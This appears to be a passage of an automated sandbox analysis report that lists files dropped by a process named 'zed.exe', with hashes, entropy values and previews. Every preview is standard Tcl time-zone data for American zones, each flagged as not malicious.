                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5JgQkS4SaEcSyS0sZSUS2kSVSXSulSASX5kAXJMsCXrUari3akaWCa3M+lafpI6L:X5kH4c9GT0E01jm5keJMRXrUEi3akaWO
                                                                                                                                                                                                                                            MD5:D78DEBC7C0B15B31635DDC34C49248BC
                                                                                                                                                                                                                                            SHA1:DB2FF76DB3A79BE52E2DFD4C7B8B6592946772F9
                                                                                                                                                                                                                                            SHA-256:214F97A3BCB2378CCE23D280EA6A3B691604F82E383628F666BE585BB8494932
                                                                                                                                                                                                                                            SHA-512:E5FCD0B54F61910E70B1D0EE9911C5B4AFF850F16B651A01D69A63A97880913B0BAB99B0D864C4E613594734FA72CCA0E9607B1ADB6E75957C790990114FD0A4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Montevideo) {.. {-9223372036854775808 -13491 0 LMT}.. {-1942690509 -13491 0 MMT}.. {-1567455309 -14400 0 -04}.. {-1459627200 -10800 0 -0330}.. {-1443819600 -12600 0 -0330}.. {-1428006600 -10800 1 -0330}.. {-1412283600 -12600 0 -0330}.. {-1396470600 -10800 1 -0330}.. {-1380747600 -12600 0 -0330}.. {-1141590600 -10800 1 -0330}.. {-1128286800 -12600 0 -0330}.. {-1110141000 -10800 1 -0330}.. {-1096837200 -12600 0 -0330}.. {-1078691400 -10800 1 -0330}.. {-1065387600 -12600 0 -0330}.. {-1047241800 -10800 1 -0330}.. {-1033938000 -12600 0 -0330}.. {-1015187400 -10800 1 -0330}.. {-1002488400 -12600 0 -0330}.. {-983737800 -10800 1 -0330}.. {-971038800 -12600 0 -0330}.. {-954707400 -10800 1 -0330}.. {-938984400 -12600 0 -0330}.. {-920838600 -10800 1 -0330}.. {-907534800 -12600 0 -0330}.. {-896819400 -10800 1 -0330}.. {-853621200 -9000 0 -03}.. {-84
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):190
                                                                                                                                                                                                                                            Entropy (8bit):4.748877320903638
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0qMKLRXnXHAIg20qMKLRE6RL/2IAcGEzQ21h4IAcH:SlSWB9vsM3y7RQtHAIgpRQPN/290zQgp
                                                                                                                                                                                                                                            MD5:9130CD86BD6417DB877BF9D8F3080CE1
                                                                                                                                                                                                                                            SHA1:76C37982C37FE54ED539AC14B5A513817E42937C
                                                                                                                                                                                                                                            SHA-256:97F48948EF5108FE1F42D548EA47C88D4B51BF1896EE92634C7ED55555B06DBD
                                                                                                                                                                                                                                            SHA-512:EE036350AF95414392BD93DFF528F67D9A93EB192A30056ECBC3D2396AB4B2938B3C096C3EC2BC739294D4C4B7261C427B0AAEB9559F5381CB7F375892781820
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Toronto)]} {.. LoadTimeZoneFile America/Toronto..}..set TZData(:America/Montreal) $TZData(:America/Toronto)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):204
                                                                                                                                                                                                                                            Entropy (8bit):4.878534808314885
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290zQ1HK90ppv:MByMYbpwt290zQ490b
                                                                                                                                                                                                                                            MD5:CB5988A2508285B42C2BD487B8F9D6E1
                                                                                                                                                                                                                                            SHA1:EAD740A566245B682CE5E284D389DFAE66DF05D9
                                                                                                                                                                                                                                            SHA-256:6C3EE46983A3DAA91C9ADF4B18D6B4B80F1505B0057569B66D5B465D4C09B9C1
                                                                                                                                                                                                                                            SHA-512:48796213A67F0E3BC56B54CE4D8BE098E74BA5808C9A1082D9381CB729ADFA2ACB9CE9E39A3244B3901405761C97AEE28D44C3BF7239ECC71175C62E152029C4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Montserrat) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):188
                                                                                                                                                                                                                                            Entropy (8bit):4.785765433607229
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0qMKLRXnXHAIg20qMKLRE6RL/2IAcGEwEzEeIAcGu:SlSWB9vsM3y7RQtHAIgpRQPN/290xzEf
                                                                                                                                                                                                                                            MD5:F7DAD684104D917E0F29F6951EA627AC
                                                                                                                                                                                                                                            SHA1:E57B5CA730D90C5865CF32FEC4872F71E033D21C
                                                                                                                                                                                                                                            SHA-256:A889810B8BB42CD206D8F8961164AD03CCFBB1924D583075489F78AFA10EAF67
                                                                                                                                                                                                                                            SHA-512:8284F2A357A32B2F5A211904F65E3B5C37B77C9BF38C85DFA0A95A73457F3076EC12F09BC767B4D0B8FC86BF69D01A17A7BF685BAB72F3E519A397D050DA0C3B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Toronto)]} {.. LoadTimeZoneFile America/Toronto..}..set TZData(:America/Nassau) $TZData(:America/Toronto)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):11373
                                                                                                                                                                                                                                            Entropy (8bit):3.8110553140357086
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:HeohzORhK1a8phYvNoStCt/cL1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:+uORhK1a8phYloSItON0HY2iUmUFLqU
                                                                                                                                                                                                                                            MD5:385C3BDD3E41E5E75CEF0658322B5CDE
                                                                                                                                                                                                                                            SHA1:0334C21C8316ED2EE16FC98B1E8867D5E0916C00
                                                                                                                                                                                                                                            SHA-256:7BA7DA179AA7DF26AC25E7ACCD9BD83784174445285A0D9CCBD7D6A9AA34F4BC
                                                                                                                                                                                                                                            SHA-512:764B680FB8414B5AC8FB110247C19B1004A4453DD2BAC94BF3CFD80281FF3679A5B1D212238509165E022269503ED14A54B0EF73AF7014344752E6A627657D1F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/New_York) {.. {-9223372036854775808 -17762 0 LMT}.. {-2717650800 -18000 0 EST}.. {-1633280400 -14400 1 EDT}.. {-1615140000 -18000 0 EST}.. {-1601830800 -14400 1 EDT}.. {-1583690400 -18000 0 EST}.. {-1577905200 -18000 0 EST}.. {-1570381200 -14400 1 EDT}.. {-1551636000 -18000 0 EST}.. {-1536512400 -14400 1 EDT}.. {-1523210400 -18000 0 EST}.. {-1504458000 -14400 1 EDT}.. {-1491760800 -18000 0 EST}.. {-1473008400 -14400 1 EDT}.. {-1459706400 -18000 0 EST}.. {-1441558800 -14400 1 EDT}.. {-1428256800 -18000 0 EST}.. {-1410109200 -14400 1 EDT}.. {-1396807200 -18000 0 EST}.. {-1378659600 -14400 1 EDT}.. {-1365357600 -18000 0 EST}.. {-1347210000 -14400 1 EDT}.. {-1333908000 -18000 0 EST}.. {-1315155600 -14400 1 EDT}.. {-1301853600 -18000 0 EST}.. {-1283706000 -14400 1 EDT}.. {-1270404000 -18000 0 EST}.. {-1252256400 -14400 1 EDT}.. {-123895440
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):189
                                                                                                                                                                                                                                            Entropy (8bit):4.799414617322291
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0qMKLRXnXHAIg20qMKLRE6RL/2IAcGEwMueh4IAcH:SlSWB9vsM3y7RQtHAIgpRQPN/2905u+p
                                                                                                                                                                                                                                            MD5:B01CC44E5139066F87ADFF16728B98BF
                                                                                                                                                                                                                                            SHA1:4464E187AFF336C9137094308C270BB822974DF1
                                                                                                                                                                                                                                            SHA-256:55C37BF1A579A22A790ADE6585CE95BEC02DA356E84D2EF7832C422A4484FF9D
                                                                                                                                                                                                                                            SHA-512:A45166FFE444982593CBAC3E683D25D9EDB070DB6CD059A83D1C52099F409FFBFE6EA68D255AD000AF142BF8C8D100271531852263677184597877B7BF318847
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Toronto)]} {.. LoadTimeZoneFile America/Toronto..}..set TZData(:America/Nipigon) $TZData(:America/Toronto)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8680
                                                                                                                                                                                                                                            Entropy (8bit):3.965662913874442
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:OrBvOs5vzC9+j1giaJCUbtp0nFI+g/iexpCVaBnNnt61nctE1:OrBvOsM9DiaJCUbPI+D/iMpCIBSuk
                                                                                                                                                                                                                                            MD5:9A5F536932FED5A93E2C3DEB81960CD1
                                                                                                                                                                                                                                            SHA1:8E78396D280DD3A9564CEFC7FB722437F3C4D003
                                                                                                                                                                                                                                            SHA-256:8E971C9560CCE548B46626D072E62AB0F4C9682BF6A6ABFB4D0E8D63745402FE
                                                                                                                                                                                                                                            SHA-512:60CFDBCE87F9CD7F27E071D66B97E60F62E56F413DC867BC809490B30D00045D0757710D6B5724148E2A28BD1E45FB662391820E6350D998002BF67B16776645
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Nome) {.. {-9223372036854775808 46702 0 LMT}.. {-3225223727 -39698 0 LMT}.. {-2188947502 -39600 0 NST}.. {-883573200 -39600 0 NST}.. {-880196400 -36000 1 NWT}.. {-769395600 -36000 1 NPT}.. {-765374400 -39600 0 NST}.. {-757342800 -39600 0 NST}.. {-86878800 -39600 0 BST}.. {-31496400 -39600 0 BST}.. {-21466800 -36000 1 BDT}.. {-5745600 -39600 0 BST}.. {9982800 -36000 1 BDT}.. {25704000 -39600 0 BST}.. {41432400 -36000 1 BDT}.. {57758400 -39600 0 BST}.. {73486800 -36000 1 BDT}.. {89208000 -39600 0 BST}.. {104936400 -36000 1 BDT}.. {120657600 -39600 0 BST}.. {126709200 -36000 1 BDT}.. {152107200 -39600 0 BST}.. {162392400 -36000 1 BDT}.. {183556800 -39600 0 BST}.. {199285200 -36000 1 BDT}.. {215611200 -39600 0 BST}.. {230734800 -36000 1 BDT}.. {247060800 -39600 0 BST}.. {262789200 -36000 1 BDT}.. {278510400 -39600 0 BST}.. {29423880
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1397
                                                                                                                                                                                                                                            Entropy (8bit):3.78056049136398
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5TenykFxCFbF3YCFE2FBCFDFr9CFaFPBCFoF2CFTFKCFDuF1CF2F1CFWFhCFGF3a:5quY9EmFYBosNZNW/bWsBzgCccq7JYN9
                                                                                                                                                                                                                                            MD5:B4F4530FCE4BF5690042A2DA40413D56
                                                                                                                                                                                                                                            SHA1:52D5F2102485F5B326C888A287ED83CA18833BBC
                                                                                                                                                                                                                                            SHA-256:9011C76295E6B17CC1973876B497BEE21B9E6562FB25DF66140F811A1FFA9765
                                                                                                                                                                                                                                            SHA-512:08CAF75226D190D9FF0AA62AD84B13F1BF9047338A690847DF5B448BDB731A877F3E186298AFD704F4F4E133FF3F3128B098F9D90AE9A8E726AE52F84A7DA2E3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Noronha) {.. {-9223372036854775808 -7780 0 LMT}.. {-1767217820 -7200 0 -02}.. {-1206961200 -3600 1 -02}.. {-1191366000 -7200 0 -02}.. {-1175378400 -3600 1 -02}.. {-1159830000 -7200 0 -02}.. {-633823200 -3600 1 -02}.. {-622072800 -7200 0 -02}.. {-602287200 -3600 1 -02}.. {-591836400 -7200 0 -02}.. {-570751200 -3600 1 -02}.. {-560214000 -7200 0 -02}.. {-539128800 -3600 1 -02}.. {-531356400 -7200 0 -02}.. {-191368800 -3600 1 -02}.. {-184201200 -7200 0 -02}.. {-155167200 -3600 1 -02}.. {-150073200 -7200 0 -02}.. {-128901600 -3600 1 -02}.. {-121129200 -7200 0 -02}.. {-99957600 -3600 1 -02}.. {-89593200 -7200 0 -02}.. {-68421600 -3600 1 -02}.. {-57970800 -7200 0 -02}.. {499744800 -3600 1 -02}.. {511232400 -7200 0 -02}.. {530589600 -3600 1 -02}.. {540262800 -7200 0 -02}.. {562125600 -3600 1 -02}.. {571194000 -7200 0 -02}.. {592970400 -
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8557
                                                                                                                                                                                                                                            Entropy (8bit):3.8810445182855253
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:WEktwmGaLV911sF9A604qSScBgN+4ctDzIVQ/c/3hNxTh:WBwDPPA604qSBgI7DBch
                                                                                                                                                                                                                                            MD5:10AF9E9461DD03DA4F0AF0595EB36E6C
                                                                                                                                                                                                                                            SHA1:57AC9BDE3AC665E49D9D2463A4BFA38C053A4A54
                                                                                                                                                                                                                                            SHA-256:D0D8B108453265B60F525A4EC04DE9555087CD6AC5DDBA980B3A96CF0FCD68D1
                                                                                                                                                                                                                                            SHA-512:B6DC7D2709A19B911E086C988DB8346F42DBF7601D9E51E3093C6AF897570E43E5F1C101FE88BC5251F3DCC3B532DB22FFE8A12A4D0151BC52AF3E6DDEA7D23A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/North_Dakota/Beulah) {.. {-9223372036854775808 -24427 0 LMT}.. {-2717643600 -25200 0 MST}.. {-1633273200 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1601823600 -21600 1 MDT}.. {-1583683200 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-84380400 -21600 1 MDT}.. {-68659200 -25200 0 MST}.. {-52930800 -21600 1 MDT}.. {-37209600 -25200 0 MST}.. {-21481200 -21600 1 MDT}.. {-5760000 -25200 0 MST}.. {9968400 -21600 1 MDT}.. {25689600 -25200 0 MST}.. {41418000 -21600 1 MDT}.. {57744000 -25200 0 MST}.. {73472400 -21600 1 MDT}.. {89193600 -25200 0 MST}.. {104922000 -21600 1 MDT}.. {120643200 -25200 0 MST}.. {126694800 -21600 1 MDT}.. {152092800 -25200 0 MST}.. {162378000 -21600 1 MDT}.. {183542400 -25200 0 MST}.. {199270800 -21600 1 MDT}.. {215596800 -25200 0 MST}.. {230720400 -21600 1
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8557
                                                                                                                                                                                                                                            Entropy (8bit):3.867423227197841
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:ZEktwmGaLV9tZlNA604qSScBgN+4ctDzIVQ/c/3hNxTh:ZBwD6fA604qSBgI7DBch
                                                                                                                                                                                                                                            MD5:33C03AD65753D7ADB45FC4899B504D1A
                                                                                                                                                                                                                                            SHA1:ED719BB67A64DB49901BA38A945A6BA998646B8D
                                                                                                                                                                                                                                            SHA-256:ABC2B6C97D9E9FBA37AC582ADBA2CE996890D090060E083405D75CDAED9EABE0
                                                                                                                                                                                                                                            SHA-512:69592E8A370C8A5173827500CDDF8190AB44EA87CD7E0C416055CB7958B13A737801EA6B0FFE6032CB3F14F05001BF9DA83E4AEB20F385019B2985ECE7ACB40E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/North_Dakota/Center) {.. {-9223372036854775808 -24312 0 LMT}.. {-2717643600 -25200 0 MST}.. {-1633273200 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1601823600 -21600 1 MDT}.. {-1583683200 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-84380400 -21600 1 MDT}.. {-68659200 -25200 0 MST}.. {-52930800 -21600 1 MDT}.. {-37209600 -25200 0 MST}.. {-21481200 -21600 1 MDT}.. {-5760000 -25200 0 MST}.. {9968400 -21600 1 MDT}.. {25689600 -25200 0 MST}.. {41418000 -21600 1 MDT}.. {57744000 -25200 0 MST}.. {73472400 -21600 1 MDT}.. {89193600 -25200 0 MST}.. {104922000 -21600 1 MDT}.. {120643200 -25200 0 MST}.. {126694800 -21600 1 MDT}.. {152092800 -25200 0 MST}.. {162378000 -21600 1 MDT}.. {183542400 -25200 0 MST}.. {199270800 -21600 1 MDT}.. {215596800 -25200 0 MST}.. {230720400 -21600 1
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8560
                                                                                                                                                                                                                                            Entropy (8bit):3.879452555978431
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:GEktwmGaLV9nlNA604qSScBgN+4ctDzIVQ/c/3hNxTh:GBwD2fA604qSBgI7DBch
                                                                                                                                                                                                                                            MD5:3D3DC12209293086FD843738A4FE87FB
                                                                                                                                                                                                                                            SHA1:8103DFA18B5F3F36AF0B53FA350E0F2D300E6289
                                                                                                                                                                                                                                            SHA-256:8803FF7C81C933B57178B9D3C502FB4268D9AA594A3C638A7F17AF60B12D300D
                                                                                                                                                                                                                                            SHA-512:39BB939780A71B817F82D2B7F56815D33926D150525161051A9950E5A98BA9184670AFC884A1C69D56EADBD6198E3082975448EFBA5FE8A336DB071E6BAB8EF2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/North_Dakota/New_Salem) {.. {-9223372036854775808 -24339 0 LMT}.. {-2717643600 -25200 0 MST}.. {-1633273200 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1601823600 -21600 1 MDT}.. {-1583683200 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-84380400 -21600 1 MDT}.. {-68659200 -25200 0 MST}.. {-52930800 -21600 1 MDT}.. {-37209600 -25200 0 MST}.. {-21481200 -21600 1 MDT}.. {-5760000 -25200 0 MST}.. {9968400 -21600 1 MDT}.. {25689600 -25200 0 MST}.. {41418000 -21600 1 MDT}.. {57744000 -25200 0 MST}.. {73472400 -21600 1 MDT}.. {89193600 -25200 0 MST}.. {104922000 -21600 1 MDT}.. {120643200 -25200 0 MST}.. {126694800 -21600 1 MDT}.. {152092800 -25200 0 MST}.. {162378000 -21600 1 MDT}.. {183542400 -25200 0 MST}.. {199270800 -21600 1 MDT}.. {215596800 -25200 0 MST}.. {230720400 -2160
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7429
                                                                                                                                                                                                                                            Entropy (8bit):3.5470060859729253
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:0ixKXpbzvZ+FxAqe12voJ0euJFNgIHc/QEeF5Z1V8tCSfifK3facfzQWWLQelXuC:0LRJq9LstgV
                                                                                                                                                                                                                                            MD5:FC9CEA4B9654D0957F55CB0E1B25A3E7
                                                                                                                                                                                                                                            SHA1:8BFC3E8CEC34C4087579D3DA727143E3EC045B77
                                                                                                                                                                                                                                            SHA-256:12917DAAA60134BFE56E6979BB27B58A3F295C32BAE02B233E849BCED6B8BCA2
                                                                                                                                                                                                                                            SHA-512:355628F2EFF86605653A1EE7D976CE8B3229A4169D35576F6007FABAB37DD280D8F296EE88BECE3D84D3A1C476F23275D1D77CAF157E9A98672CBF14801D7292
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Nuuk) {.. {-9223372036854775808 -12416 0 LMT}.. {-1686083584 -10800 0 -03}.. {323845200 -7200 0 -02}.. {338950800 -10800 0 -03}.. {354675600 -7200 1 -02}.. {370400400 -10800 0 -03}.. {386125200 -7200 1 -02}.. {401850000 -10800 0 -03}.. {417574800 -7200 1 -02}.. {433299600 -10800 0 -03}.. {449024400 -7200 1 -02}.. {465354000 -10800 0 -03}.. {481078800 -7200 1 -02}.. {496803600 -10800 0 -03}.. {512528400 -7200 1 -02}.. {528253200 -10800 0 -03}.. {543978000 -7200 1 -02}.. {559702800 -10800 0 -03}.. {575427600 -7200 1 -02}.. {591152400 -10800 0 -03}.. {606877200 -7200 1 -02}.. {622602000 -10800 0 -03}.. {638326800 -7200 1 -02}.. {654656400 -10800 0 -03}.. {670381200 -7200 1 -02}.. {686106000 -10800 0 -03}.. {701830800 -7200 1 -02}.. {717555600 -10800 0 -03}.. {733280400 -7200 1 -02}.. {749005200 -10800 0 -03}.. {764730000 -7200 1 -0
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2069
                                                                                                                                                                                                                                            Entropy (8bit):3.994692300159945
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5Pe89WU0S+VS+TjV/NF01YluO53ON4Lvf3Pn:5gU033FS1YluOQiLvf3Pn
                                                                                                                                                                                                                                            MD5:0CB80C895BB4BFD36043F1CAAFB604B7
                                                                                                                                                                                                                                            SHA1:2EC2CA1D31EF1804E4EC26F449CA0D3C4F7AA7A0
                                                                                                                                                                                                                                            SHA-256:FC857E4DD0A4AE60A7C56637C752205E20442C7AE62158435BEFCA838174108D
                                                                                                                                                                                                                                            SHA-512:4BE44FF49AC588F1B441AB1B2678F5A0F0B60DB5C69F3F45C7447FC5A0175146F9FF83E132A5256CF7E559809EF7394C23DF9156A295D84D3A67EE917E661EED
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Ojinaga) {.. {-9223372036854775808 -25060 0 LMT}.. {-1514739600 -25200 0 MST}.. {-1343066400 -21600 0 CST}.. {-1234807200 -25200 0 MST}.. {-1220292000 -21600 1 MDT}.. {-1207159200 -25200 0 MST}.. {-1191344400 -21600 0 CST}.. {820476000 -21600 0 CST}.. {828864000 -18000 1 CDT}.. {846399600 -21600 0 CST}.. {860313600 -18000 1 CDT}.. {877849200 -21600 0 CST}.. {883634400 -21600 0 CST}.. {891766800 -21600 0 MDT}.. {909302400 -25200 0 MST}.. {923216400 -21600 1 MDT}.. {941356800 -25200 0 MST}.. {954666000 -21600 1 MDT}.. {972806400 -25200 0 MST}.. {989139600 -21600 1 MDT}.. {1001836800 -25200 0 MST}.. {1018170000 -21600 1 MDT}.. {1035705600 -25200 0 MST}.. {1049619600 -21600 1 MDT}.. {1067155200 -25200 0 MST}.. {1081069200 -21600 1 MDT}.. {1099209600 -25200 0 MST}.. {1112518800 -21600 1 MDT}.. {1130659200 -25200 0 MST}.. {1143968400 -21
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):186
                                                                                                                                                                                                                                            Entropy (8bit):4.970379147398626
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/2IAcGEu5YfMXGm2OHGf8xYoHv5BidhZvFsc1HRX1va0v:SlSWB9eg/290ZDm2OHDxYoHv5GhZd93p
                                                                                                                                                                                                                                            MD5:AA408A43079EC8933DE271BE3DA2B502
                                                                                                                                                                                                                                            SHA1:421A867DB3FD4779C5F759D0B657D8EB5FB2218B
                                                                                                                                                                                                                                            SHA-256:990213DDE00ADCEB74C8D1ECAF81B9C77963E4AB1F35767F7349236FC8E917DF
                                                                                                                                                                                                                                            SHA-512:1FB740527555A8E128E05709D05720A249BCBA4B6434D00226C07426E6283AA48973F75268F36E6044F0F0650E012781C8E5519B7EA916C625BBF018B29E9961
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Panama) {.. {-9223372036854775808 -19088 0 LMT}.. {-2524502512 -19176 0 CMT}.. {-1946918424 -18000 0 EST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7736
                                                                                                                                                                                                                                            Entropy (8bit):3.8533019559841972
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:tTqPm4bPJWXtRbALtuO/N0HY2iUmUFLqU:Izod
                                                                                                                                                                                                                                            MD5:6BA298F9CEB6406802A01C13313F8EF1
                                                                                                                                                                                                                                            SHA1:D77C113CFA927EF65461781FD080F590C8CFCBB9
                                                                                                                                                                                                                                            SHA-256:1FB962ECC1E5F02E1001C70460FFF720B114554F9AA7956D6DA154DBEA87B4D7
                                                                                                                                                                                                                                            SHA-512:C7F4E2DA503A3167098CFAB7AEC8D75A32D6B081E6777DE7BA3D6B4558D0C44D2CD8A0F1626968295031BABFD2CB96B031B4C00A44F2C554B5B217AE67E69EB4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Pangnirtung) {.. {-9223372036854775808 0 0 -00}.. {-1546300800 -14400 0 AST}.. {-880221600 -10800 1 AWT}.. {-769395600 -10800 1 APT}.. {-765399600 -14400 0 AST}.. {-147902400 -7200 1 ADDT}.. {-131572800 -14400 0 AST}.. {325663200 -10800 1 ADT}.. {341384400 -14400 0 AST}.. {357112800 -10800 1 ADT}.. {372834000 -14400 0 AST}.. {388562400 -10800 1 ADT}.. {404888400 -14400 0 AST}.. {420012000 -10800 1 ADT}.. {436338000 -14400 0 AST}.. {452066400 -10800 1 ADT}.. {467787600 -14400 0 AST}.. {483516000 -10800 1 ADT}.. {499237200 -14400 0 AST}.. {514965600 -10800 1 ADT}.. {530686800 -14400 0 AST}.. {544600800 -10800 1 ADT}.. {562136400 -14400 0 AST}.. {576050400 -10800 1 ADT}.. {594190800 -14400 0 AST}.. {607500000 -10800 1 ADT}.. {625640400 -14400 0 AST}.. {638949600 -10800 1 ADT}.. {657090000 -14400 0 AST}.. {671004000 -10800 1 ADT}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):253
                                                                                                                                                                                                                                            Entropy (8bit):4.784405839512086
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/290olofDm2OHekeoHXFIV/1Vw/9vVOzFZg/VVFAKV:MB86290oloLmdHeVCXqV/k/9v4zW/OW
                                                                                                                                                                                                                                            MD5:BFCE7E2618D6935031D6941AD6DDD8E3
